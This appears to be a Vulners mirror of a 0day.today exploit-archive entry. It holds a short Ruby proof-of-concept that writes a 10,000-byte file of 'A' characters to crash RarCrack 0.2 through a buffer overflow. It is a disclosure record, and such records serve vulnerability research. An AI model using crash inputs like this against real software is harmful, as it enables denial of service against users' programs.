Lucene search
K

RarCrack 0.2 Buffer Overflow POC

🗓️ 21 Sep 2010 00:00:00Reported by [email protected]Type 
zdt
 zdt
🔗 0day.today👁 13 Views

RarCrack 0.2 Buffer Overflow POC, Impact: crashes while crackin

Code
================================
RarCrack 0.2 Buffer Overflow POC
================================

#!/usr/bin/env ruby
#  overflow.rb
#
#    __________  ____  __  ______  _________
#   / ____/ __ \/ __ \/ / / / __ \/ ____<  /
#  / / __/ /_/ / / / / / / / /_/ /___ \ / /
# / /_/ / _, _/ /_/ / /_/ / ____/___/ // / 
# \____/_/ |_|\____/\____/_/   /_____//_/  
#                                        
#
#   Title:      RarCrack 0.2 Buffer Overflow POC
#   Date:       19.09.2010
#   Author:     [email protected]
#   Email:      the_unknown [at] group51.org
#   Twitter:    @The_UnKn0wn
#   Homepage:   http://group51.org 
#   Software Link:  http://sourceforge.net/projects/rarcrack/files/rarcrack-0.2/%5BUnnamed%20release%5D/rarcrack-0.2.tar.bz2/download
#   Version:    0.2
#   Tested on:  openSUSE 11.3
#   CVE:        none
#
#   Impact:     RarCrack doesn't check the length of the archive and while cracking it crashes.
#
#   Usage:
#       $ ruby overflow.rb
#       $ ./rarcrack overflow.zip
#      
 
text = "A"*10000
 
File.open("overflow.zip","w") do |l|
    l.puts(text)
end



#  0day.today [2018-02-18]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Sep 2010 00:00Current
7High risk
Vulners AI Score7
13